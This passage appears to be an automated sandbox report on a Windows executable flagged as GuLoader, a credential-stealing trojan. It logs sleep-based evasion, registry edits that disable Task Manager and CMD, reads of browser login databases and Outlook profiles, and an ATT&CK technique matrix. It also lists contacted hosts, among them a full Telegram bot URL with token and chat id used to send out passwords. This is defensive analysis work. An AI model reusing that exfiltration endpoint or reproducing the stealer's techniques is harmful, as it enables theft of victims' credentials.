            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596960Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596466Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594951Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594508Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594391Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594247Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594141Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 593974Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 593844Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeWindow / User API: threadDelayed 3855Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeWindow / User API: threadDelayed 5964Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscEDE4.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeAPI coverage: 2.5 %
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -29514790517935264s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 4260Thread sleep count: 3855 > 30Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599886s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 4260Thread sleep count: 5964 > 30Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598157s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -598030s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597920s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597804s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597200s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -597092s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596960s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596466s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594951s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594508s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594247s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -594141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -593974s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exe TID: 2500Thread sleep time: -593844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_0040672B FindFirstFileW,FindClose,1_2_0040672B
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405AFA
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00402868 FindFirstFileW,1_2_00402868
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00402868 FindFirstFileW,7_2_00402868
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_0040672B FindFirstFileW,FindClose,7_2_0040672B
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405AFA
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599886Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598843Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598391Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598157Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598030Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597920Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597804Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597200Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597092Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596960Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596466Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595813Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594951Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594508Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594391Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594247Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 594141Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 593974Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 593844Jump to behavior
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2542671564.00000000048E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeAPI call chain: ExitProcess graph end nodegraph_1-4593
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeAPI call chain: ExitProcess graph end nodegraph_1-4748
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_75561B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_75561B5F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess created: C:\Users\user\Desktop\V7OHj6ISEo.exe "C:\Users\user\Desktop\V7OHj6ISEo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Users\user\Desktop\V7OHj6ISEo.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004034A5
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: V7OHj6ISEo.exe PID: 4136, type: MEMORYSTR
            Source: Yara matchFile source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: V7OHj6ISEo.exe PID: 4136, type: MEMORYSTR
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: V7OHj6ISEo.exe PID: 4136, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: V7OHj6ISEo.exe PID: 4136, type: MEMORYSTR
            Source: Yara matchFile source: 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: V7OHj6ISEo.exe PID: 4136, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            V7OHj6ISEo.exe76%VirustotalBrowse
            V7OHj6ISEo.exe61%ReversingLabsWin32.Trojan.GuLoader
            V7OHj6ISEo.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nscEDE4.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nscEDE4.tmp\System.dll0%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.186.110
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.65
              truefalse
                high
                reallyfreegeoip.org
                104.21.32.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comV7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://drive.usercontent.google.com/IV7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009686731.0000000004960000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009633754.0000000004959000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgV7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003546E000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035351000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035512000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botV7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsV7OHj6ISEo.exe, 00000007.00000003.1974851418.0000000004961000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/V7OHj6ISEo.exe, 00000007.00000002.2542671564.00000000048E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgV7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035188000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgV7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/V7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009686731.0000000004960000.00000004.00000020.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000003.2009633754.0000000004959000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.google.com/LV7OHj6ISEo.exe, 00000007.00000002.2542671564.00000000048E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgV7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003546E000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035351000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035512000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035163000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003524B000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035300000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.000000003516F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
